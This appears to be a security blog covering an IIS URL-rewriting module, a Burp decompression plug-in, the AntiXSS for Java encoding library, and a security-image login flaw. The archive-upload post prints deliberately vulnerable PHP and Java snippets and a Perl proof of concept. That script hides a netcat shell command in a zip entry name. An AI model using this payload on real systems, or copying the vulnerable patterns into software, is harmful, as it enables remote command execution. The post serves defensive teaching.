
Bi-Directional HTTP Transformation

The ability to transform and inspect HTTP data as it flows in and out of a web application has many practical uses (both inside and outside of security). On IIS, this capability was historically restricted to ISAPI filters. Http Modules written in ASP.NET have always allowed processing of requests and responses to and from an ASP.NET application, but with the advent of IIS7 and the integrated ASP.NET pipeline, Http Modules written in ASP.NET now have access to virtually all stages of request processing (including those not handled by ASP.NET).

Transformer.NET is an Http Module designed for on-the-fly inbound and outbound url rewriting. Apache's mod_rewrite, used to manipulate inbound request urls, is arguably one of the most popular Apache modules around. While there have been several ports of mod_rewrite to IIS (with implementations ranging from Http Modules to ISAPIs), they all share one shortcoming in common with their Apache predecessor: They only rewrite requests and not urls within outbound responses (such as links that are generated within an HTML page).

This has long been a pet peeve of mine. If you want to use mod_rewrite, you typically need to update the underlying website source code so that the hyperlinks within the application point to the "rewritten" urls. This can be a major effort and inconvenience if the site is already written, and even worse, it may not be possible for 3rd party or COTS web applications.

The initial beta release of Transformer.NET differs from previous rewrite modules because it supports bi-directional (inbound and outbound) url rewriting. Bi-directional rewriting eliminates the need to modify the underlying website code, which is great for legacy or third party web sites and applications. In addition to the ability to parse response content (such as HTML), Transformer.NET also includes the following two key internal mechanisms:


Normalization Engine

Normalizing all urls into their absolute representation quickly became essential for two reasons. First, the module needs to be able to apply configured rules to a given url in any form. So a rule for "/foo/bar.htm" might need to be applied to "bar.htm", "../bar.htm", or any number of other relative url variants, depending on the path of the rendering page. Second, if "/foo/bar.htm" is rewritten to "/fake/bar.htm", then all of the relative links on the page (images, css, etc) will suddenly be broken, because the browser now resolves them against "/fake/" instead of "/foo/". Replacing a relative link on a rewritten page with its absolute counterpart is therefore essential.
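
To make the normalization step concrete, here is a minimal sketch in Java (Transformer.NET itself is a .NET module, so this is an illustration of the idea, not the module's code). The class and method names are made up for the example; only java.net.URI is a real API.

```java
import java.net.URI;

class UrlNormalizerSketch {
    /**
     * Resolves a link found on a page against that page's own url and
     * returns the absolute, dot-free path that rewrite rules can match.
     */
    static String toAbsolutePath(String pageUrl, String link) {
        URI resolved = URI.create(pageUrl).resolve(link).normalize();
        return resolved.getPath();
    }
}
```

With this helper, "bar.htm" on a page under /foo/ and "../bar.htm" on a page under /foo/sub/ both come out as "/foo/bar.htm", so a single rule can cover every variant.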

Internal Url Cache

Like anything in the software world, performance is important. Inspecting and transforming very large responses when lots of rules have been defined can be a real performance killer. To help minimize performance impact, Transformer.NET maintains an internal cache of all rewrites that are performed. This eliminates un-needed processing the next time the url is rendered on a page. The net result is that as more requests are parsed by the module, performance impact continually decreases. To avoid stale cache entries, the cache gets cleared any time a change is made to a rewrite rule.
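
The caching behavior described above can be sketched roughly as follows. This is an assumption-laden illustration in Java, not Transformer.NET's implementation: the class name is hypothetical, and the rule set is modeled as a plain function that returns the url unchanged when no rule matches.

```java
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.function.Function;

class RewriteCacheSketch {
    private final Map<String, String> cache = new ConcurrentHashMap<>();
    // Hypothetical stand-in for the configured rewrite rules.
    private volatile Function<String, String> rules;

    RewriteCacheSketch(Function<String, String> rules) {
        this.rules = rules;
    }

    /** Evaluates the rules only the first time a given url is seen. */
    String rewrite(String absoluteUrl) {
        return cache.computeIfAbsent(absoluteUrl, url -> rules.apply(url));
    }

    /** Any rule change clears the cache so no stale rewrite is served. */
    void updateRules(Function<String, String> newRules) {
        this.rules = newRules;
        cache.clear();
    }
}
```

The cache is keyed on the normalized (absolute) url, which is why normalization has to happen first: otherwise every relative spelling of the same link would get its own entry.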

The bi-directional rewriting capability of Transformer.NET was really an initial "proof-of-concept" for us to start building bi-directional HTTP inspection and transformation solutions to solve some very interesting web application security problems.
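
For readers who want to see the two directions side by side, here is a small sketch in Java. It is not how Transformer.NET is built; the class name, the one-to-one rule table and the regular expression are all assumptions made for the example, and a real module would need proper HTML parsing and normalized urls.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

class BidirectionalRewriterSketch {
    private final Map<String, String> internalToPublic = new LinkedHashMap<>();
    private final Map<String, String> publicToInternal = new LinkedHashMap<>();
    // Simplification: only double-quoted href/src attributes are considered.
    private static final Pattern LINK = Pattern.compile("(href|src)=\"([^\"]*)\"");

    void addRule(String internalPath, String publicPath) {
        internalToPublic.put(internalPath, publicPath);
        publicToInternal.put(publicPath, internalPath);
    }

    /** Inbound: map the public url in the request back to the real resource. */
    String rewriteInbound(String requestPath) {
        return publicToInternal.getOrDefault(requestPath, requestPath);
    }

    /** Outbound: replace internal urls in the response with their public form. */
    String rewriteOutbound(String html) {
        Matcher m = LINK.matcher(html);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            String target = internalToPublic.getOrDefault(m.group(2), m.group(2));
            String attr = m.group(1) + "=\"" + target + "\"";
            m.appendReplacement(out, Matcher.quoteReplacement(attr));
        }
        m.appendTail(out);
        return out.toString();
    }
}
```

Because the outbound pass rewrites the links the application emits, the application's own source never has to know about the public urls.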

Unlike Apache's mod_rewrite, Transformer.NET does not implement conditional rewrites (a la mod_rewrite's RewriteCond), so it is not intended to be a total port. The current beta version can be downloaded from our tools page. Transformer.NET works on IIS6 (limited to ASP.NET applications) and with any site running on IIS7. A detailed user guide is included with the download.


A "Deflate" Burp Plug-In

I wrote a plug-in for Burp Proxy that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression data formats. This arose out of an immediate need on a recent web application security assessment.

While inspecting the HTTP traffic between the client and server of the application under review, I noticed that most of the response bodies appeared to be compressed and, unfortunately, were not being decoded by Burp (despite the "unpack gzip" option being enabled). The client, a Java applet, relied on response data for a lot of interesting functionality (including access control), and being able to easily view and manipulate the contents in plaintext before they reached the applet was clearly beneficial (let's ignore the obvious client-side security issue here; this is a topic for another discussion).

As I mentioned earlier, it appeared the response content was compressed; however the expected Content-Encoding HTTP response header was not present. Inspection of the de-compiled Java applet code confirmed that compression was being performed with the and classes. At present, Burp Proxy does not support the ZLIB and DEFLATE compression formats (only GZIP compression is supported).
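
As a rough illustration of what inflating such a body involves (this is a sketch, not the plug-in's source), the snippet below tries the ZLIB (RFC1950) framing first and falls back to raw DEFLATE (RFC1951). The class and method names are hypothetical; java.util.zip.Inflater and its "nowrap" constructor flag are the standard JDK API.

```java
import java.io.ByteArrayOutputStream;
import java.util.Arrays;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;

class DeflateBodySketch {
    /** Inflates one complete body; rawDeflate=true means no ZLIB header or checksum. */
    static byte[] inflate(byte[] body, boolean rawDeflate) throws DataFormatException {
        Inflater inflater = new Inflater(rawDeflate);
        try {
            // The Inflater documentation asks for one extra dummy input byte in nowrap mode.
            inflater.setInput(rawDeflate ? Arrays.copyOf(body, body.length + 1) : body);
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            while (!inflater.finished()) {
                int n = inflater.inflate(buffer);
                if (n == 0 && (inflater.needsInput() || inflater.needsDictionary())) {
                    throw new DataFormatException("truncated stream or preset dictionary required");
                }
                out.write(buffer, 0, n);
            }
            return out.toByteArray();
        } finally {
            inflater.end();
        }
    }

    /** Tries RFC1950 framing first, then raw RFC1951 data. */
    static byte[] decode(byte[] body) {
        try {
            return inflate(body, false);
        } catch (DataFormatException notZlib) {
            try {
                return inflate(body, true);
            } catch (DataFormatException notDeflate) {
                throw new IllegalArgumentException("body is neither zlib nor raw deflate", notDeflate);
            }
        }
    }
}
```

Guessing the format by trial is a pragmatic choice here because, as noted above, the server did not send a Content-Encoding header to say which one was in use. It is a heuristic, so a raw stream that happens to look like a valid ZLIB header could in principle be misread.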

Burp is an essential tool in any web app testing toolkit and extending its functionality to inflate "deflate" compressed response content via the handy IBurpExtender interface seemed a worthwhile contribution. I hope others find the plug-in useful as well; at a minimum, it will be useful when the application returns for a round of regression testing.

The Burp plug-in can be downloaded here.

Also included with the download is an example servlet called "DeflateTestServlet" that generates HTTP response bodies in the RFC1950 and RFC1951 compressed formats for testing the plug-in.

Also, here's a good link that may help clarify your understanding of the compression formats used with HTTP.


Handling Uploaded Archives Securely

Insecure handling of file uploads is one of my favorite issues to test for during web application security assessments. Such flaws often provide exploitable attack vectors for compromising the server, application and/or end-user. In this post, I focus on insecure handling of uploaded archive files, something I've seen repeatedly. In my experience, most of the applications vulnerable to this flaw do a fairly good job of vetting the uploaded file itself, but fail to apply the same scrutiny to the packaged files. Consider the following PHP code snippet:

Example 1:

if (isFileValidArchive()) {
    $files = getSortedListOfFilesFromValidatedArchive();

    foreach ($files as $filename) {
        $ext = substr($filename, strrpos($filename, '.') + 1);
        // only handle .doc files
        if ($ext == "doc") {
            // VULNERABLE: $filename comes from the archive and is attacker-controlled
            $cmd = "/usr/bin/unzip -j -o "
                 . "\"" . $filename . "\" -d /tmp/uploads";
            exec($cmd, $output);
            // process results
        }
    }
}

The $filename variable holds the name of a packaged file (such as "somefile.doc") retrieved from an uploaded archive. As usual, blind trust of user-supplied input (i.e. the name of a file packaged within a user-uploaded .zip file) creates an exploitable attack vector: in this case, arbitrary command execution. Given that the attacker's operating system is likely to prevent certain special characters within a file name, how is this exploitable?

For example, the characters < > : " / \ | ? * are typically forbidden by MS Windows operating systems. These same characters are often useful for manipulating command strings.

To answer the question above, zip compression libraries are a good solution because they provide functionality to create and package archives in memory, which are obviously not bound by OS file system constraints. Allowing special characters in a file name is likely not an oversight as it appears in line with the .ZIP File Format Specification. It's also worth noting that the spec permits the use of alternate character encodings, which could be leveraged by an attacker to bypass potential blacklist filtering mechanisms. The following Perl script uses this zip compression library to exploit the command injection flaw in Example 1.

use chilkat;

# Create a .zip archive in-memory
$zip = new chilkat::CkZip();
$zip->UnlockComponent("anything for 30-day trial");

# Package a file with a malicious file name
$zip->AppendString("foo\" & nc -c /bin/sh 8888 & \"bar.doc","junk");

From a security code review perspective, the use of the PHP exec() function in Example 1 should be an immediate red flag (whether you are a security auditor or a developer). In general, shelling out to perform OS commands is never a good idea, especially if the command potentially contains user input.

A safer alternative when building applications could be native or 3rd party zip compression APIs, such as PHP Zip File Extensions or the Java package. However, even when these are used, developers still find a way to do it insecurely. Consider Example 2, which is a code snippet from a J2EE web application:

Example 2:

ZipFile zipFile = new ZipFile(uploadedZipFile);

Enumeration<? extends ZipEntry> zipEntries = zipFile.entries();
while (zipEntries.hasMoreElements()) {
    ZipEntry zipEntry = zipEntries.nextElement();
    // VULNERABLE: the entry name is attacker-controlled and may contain "../"
    File packagedFile = new File("/tmp/uploads", zipEntry.getName());
    // Create "packagedFile" on file system and
    // Copy contents of "zipEntry" into it
}

Again, the attacker controls everything within the zip file. By embedding characters such as ../ into the name of the packaged file, an attacker could traverse out of "/tmp/uploads" and force the application to write the packaged file into any location, such as the web root directory. A simple "cmd.jsp" file would allow the attacker to execute arbitrary commands on the web server.
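
One way to catch the traversal in Example 2, if entry names must be honored at all, is to resolve the name against the upload directory and verify that the result is still inside it. The sketch below is a minimal illustration with a hypothetical class and method name; it does not account for symbolic links already present under the upload directory.

```java
import java.nio.file.Path;

class ZipEntryPathSketch {
    /**
     * Resolves an untrusted zip entry name under uploadDir and rejects any
     * name that would land outside it (for example via "../" or a leading "/").
     */
    static Path resolveInside(Path uploadDir, String entryName) {
        Path base = uploadDir.toAbsolutePath().normalize();
        Path target = base.resolve(entryName).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("zip entry escapes upload directory: " + entryName);
        }
        return target;
    }
}
```

In Example 2, the line that builds "packagedFile" would call a check like this instead of passing zipEntry.getName() straight to the File constructor.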

How can developers harden their applications so they are not vulnerable to similar mistakes? First, ensure the application is secured with appropriate server-side controls when handling file uploads, i.e.

  • maximum file size enforcement
  • file type and format restrictions
  • random filename assignment
  • virus scanning
  • storing the file into a non-web accessible directory
  • etc, etc, etc

If archive files are permitted, ensure the same level of stringent validation is also applied to packaged files and, most importantly, never trust user-supplied data elements (such as file names or other file attributes) when determining where and how a file will be stored on the file system.
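
A few of these controls are easy to sketch in Java. The following is an illustration only: the class name, the 10 MB limit and the single allowed extension are assumptions chosen for the example, not recommendations for any particular application.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.UUID;

class UploadPolicySketch {
    static final long MAX_BYTES = 10L * 1024 * 1024;                  // hypothetical limit
    static final List<String> ALLOWED_EXTENSIONS = Arrays.asList("doc"); // hypothetical whitelist

    /** Checks the extension, then discards the user-supplied name entirely. */
    static String storageNameFor(String untrustedName) {
        int dot = untrustedName.lastIndexOf('.');
        String ext = dot < 0 ? "" : untrustedName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("file type not permitted");
        }
        return UUID.randomUUID() + "." + ext;
    }

    /** Copies a packaged file while counting the bytes actually read. */
    static long copyWithLimit(InputStream in, OutputStream out, long maxBytes) throws IOException {
        byte[] buffer = new byte[8192];
        long total = 0;
        int n;
        while ((n = in.read(buffer)) != -1) {
            total += n;
            if (total > maxBytes) {
                throw new IOException("entry exceeds size limit");
            }
            out.write(buffer, 0, n);
        }
        return total;
    }
}
```

Counting bytes during the copy, rather than trusting the size recorded in the archive, matters because that size field is also attacker-controlled. The extension check here is only a first filter; validating the actual file format is still needed.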


AntiXSS for Java

I've just uploaded the latest version of AntiXSS for Java (version 0.02) to the GDS Tools page. What is AntiXSS for Java? It's a port to Java of the Microsoft Anti-Cross Site Scripting (AntiXSS) v1.5 library for .NET applications.

For those not familiar with the Microsoft AntiXSS library, it is an output encoding library for avoiding Cross Site Scripting vulnerabilities. Specifically, it is intended to safely encode information written to the user's browser within a specific context (e.g. if writing a string into the HTML of a page, you need to use the correct function - HtmlEncode). Unlike some other solutions, the library implements a white listing approach and encodes everything except characters known to be harmless. For example, the string <script> will be HTML encoded as &#60;script&#62;.

AntiXSS for Java was largely written as an educational exercise on my part, and as such the library should be considered "beta quality". However, it should be fairly usable for most applications. The library requires Java 1.4 or higher, but has no other prerequisites.


  • AntiXSS for Java comes as a source package, or alternatively you can just download the compiled Jar file. An Ant buildfile and JUnit tests are included with the source code.
  • Put AntiXSS.jar somewhere in your CLASSPATH
  • In your code, import com.gdssecurity.utils.AntiXSS
  • All of the output filtering methods are implemented statically, so just wrap your calls to output functions in a call to one of the filtering methods (identical to the methods in the Microsoft library):
    1. HtmlEncode() - a string to be used in HTML. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal HTML entity format (i.e. < is encoded as &#60;).
    2. UrlEncode() - a string to be used in a URL. This method will return characters a-z, A-Z, 0-9, full stop, dash, and underscore unencoded, and encode all other characters in short hexadecimal URL notation for non-unicode characters (i.e. < is encoded as %3c), and as unicode hexadecimal notation for unicode characters (i.e. %u0177).
    3. HtmlAttributeEncode() - a string to be used in an HTML attribute. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal HTML entity format (i.e. < is encoded as &#60;).
    4. JavaScriptEncode() - a string safe to use directly in JavaScript. This method will return characters a-z, A-Z, space, 0-9, full stop, comma, dash, and underscore unencoded, and encode all other characters in a 2 digit hexadecimal escaped format for non-unicode characters (e.g. \x17), and in a 4 digit unicode format for unicode characters (e.g. \u0177).
    5. VisualBasicScriptEncodeString() - a string to use directly in VBScript. This method will return characters a-z, A-Z, space, 0-9, full stop, comma, dash, and underscore unencoded (each substring enclosed in double quotes), and encode all other characters in concatenated calls to chrw(). e.g. foo' will be encoded as "foo"&chrw(39).
    6. XmlEncode() - a string to be used in XML. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal entity format (i.e. < is encoded as &#60;).
    7. XmlAttributeEncode() - a string to be used in an XML attribute. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal entity format (i.e. < is encoded as &#60;).
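
To show what the white listing approach looks like in code, here is a small standalone sketch that follows the character lists given above for HtmlEncode() and JavaScriptEncode(). It is not the library's source and does not use its classes; the class name is made up, and the sketch uses newer Java features than the library's Java 1.4 baseline.

```java
class WhitelistEncoderSketch {
    /** Characters passed through unencoded, per the lists above. */
    private static boolean isSafe(int c, boolean allowSpace) {
        return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
                || c == '.' || c == ',' || c == '-' || c == '_' || (allowSpace && c == ' ');
    }

    /** Everything outside the safe set becomes a decimal entity such as &#60; */
    static String htmlEncode(String input) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); ) {
            int cp = input.codePointAt(i);
            if (isSafe(cp, false)) {
                out.append((char) cp);
            } else {
                out.append("&#").append(cp).append(';');
            }
            i += Character.charCount(cp);
        }
        return out.toString();
    }

    /** Two hex digits for values below 256, four hex digits otherwise. */
    static String javaScriptEncode(String input) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            if (isSafe(c, true)) {
                out.append(c);
            } else if (c < 0x100) {
                out.append(String.format("\\x%02x", (int) c));
            } else {
                out.append(String.format("\\u%04x", (int) c));
            }
        }
        return out.toString();
    }
}
```

The point of the design is that the encoder never has to know which characters are dangerous: anything not explicitly listed as harmless is encoded, so a newly discovered attack character is already covered.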

For those of you familiar with output encoding, this library is functionally the same as the OWASP Reform library by Michael Eddington, which is not too surprising as I believe Michael was involved in developing the Microsoft AntiXSS library.

Any feedback, and especially bug reports, welcome.


Yet Another Flawed Authentication Scheme

It seems like every day I hear about a new web-based authentication technique intended to enhance user security and/or thwart phishing scams. This is especially common in the banking world, where most applications are starting to use strong two-factor authentication. Unfortunately, for most of the larger consumer web applications, implementing strong multi-factor authentication (i.e. smart cards or SecurID) is just not cost effective or practical when you have several million users. As a result, these applications must resort to other creative ways to strengthen their authentication.

One increasingly popular practice is the use of security images (known as "watermarks") to thwart phishing scams. For those not familiar with this concept (generically known as site-to-user authentication), it's supposed to work like this:

During registration, the user selects (or is assigned) a specific image. The image is one of potentially hundreds of possible images and is intended to help the user distinguish the real web-site from an impostor. The actual act of authenticating to the website is split into the following three steps:

  • Step 1: The user submits their username (only) to the website
  • Step 2: The website shows the user their personal "watermark" image, allowing them to verify that they are at the correct site.
  • Step 3: If the watermark image is correct, the user should enter his/her password to complete the login process. If the watermark image is not correct (or not shown), the user should not proceed as they are likely not at the correct website.
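
The ordering in these three steps is the whole point of the scheme, so it is worth spelling out as code. This is a toy model in Java with hypothetical names, not PassMark's design: it tracks only whether the image has been shown before the password prompt, and keeps state in memory where a real site would use the user's session.

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

class SiteToUserLoginSketch {
    private final Map<String, String> imageByUser = new HashMap<>();
    private final Set<String> imageShownTo = new HashSet<>();

    /** Registration: the user selects (or is assigned) an image. */
    void register(String username, String imageId) {
        imageByUser.put(username, imageId);
    }

    /** Steps 1 and 2: username only, answered with that user's image. */
    String submitUsername(String username) {
        String imageId = imageByUser.get(username);
        if (imageId != null) {
            imageShownTo.add(username);
        }
        return imageId;
    }

    /** Step 3 precondition: never ask for the password before the image. */
    boolean mayPromptForPassword(String username) {
        return imageShownTo.contains(username);
    }
}
```

A site that collects the password on the same screen as the username has no point at which submitUsername() could run first, which means the image can no longer tell the user anything before the secret is handed over.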

The general concept is pretty simple, and was pioneered by PassMark (acquired by RSA/EMC) several years ago. The concept (and PassMark) has been the subject of much scrutiny by both the FFIEC and security researchers in recent years, who have even published papers outlining various ways in which this scheme can be abused and subverted. What I find most interesting is that, in addition to all of the potential technical flaws that have been identified with PassMark (and similar concepts), it seems to suffer from an even more critical and fundamental flaw: most users just don't understand it.

A study published earlier this year found that 97% of people who use an image oriented site-to-user authentication scheme (as described above) still provided their password to an impostor website even though the correct security image was not shown. Even worse, it seems that some of the companies who implement this authentication scheme don't completely understand it. Consider the following real-life example:

Like many folks this holiday season, I found myself at a department store checkout counter faced with the question that every retail clerk is programmed to ask ("Would you like to save an additional 15% today by opening up a new credit card?"). Normally I decline this offer while the clerk is in mid-sentence; however, on this day I proceeded to open an account.

A few days later, I went online to pay my bill and quickly noticed the site touting its *high security* (this seems to be the marketing norm these days). During the registration process, the site forced me to pick a "Security Image" that is used to protect me from phishing scams (a la PassMark). Knowing how this process is supposed to work, you can imagine my surprise when my subsequent login to the website looked like this:

Screen 1: Login Screen (requesting user-name and password)

[Image: Login Page]

Screen 2: After authentication (displays my security image)

[Image: After Login]

What's wrong with these pictures? Unfortunately they don't show me my security image until after I have completely authenticated to the website (instead of before I provided my password)! Clearly there seems to be a lack of understanding and/or education somewhere on the other side.

A quick survey of some non-technical friends and relatives during the holidays further confirmed my suspicions. While all of them use at least one banking/bill-pay website that incorporates the use of a security image ("Oh yeah, I have a special picture that they show me every time I log in"), not one of them could explain what the image was for or even whether it gets shown to them before or after they provide their password.

The takeaway here is that (not surprisingly) end-user awareness is still, and likely always will be, a fundamental component of the success of any good security measure. There is little point in implementing a new security mechanism (especially one that depends on the user understanding it) unless the appropriate steps have been taken to ensure that everyone has been properly educated.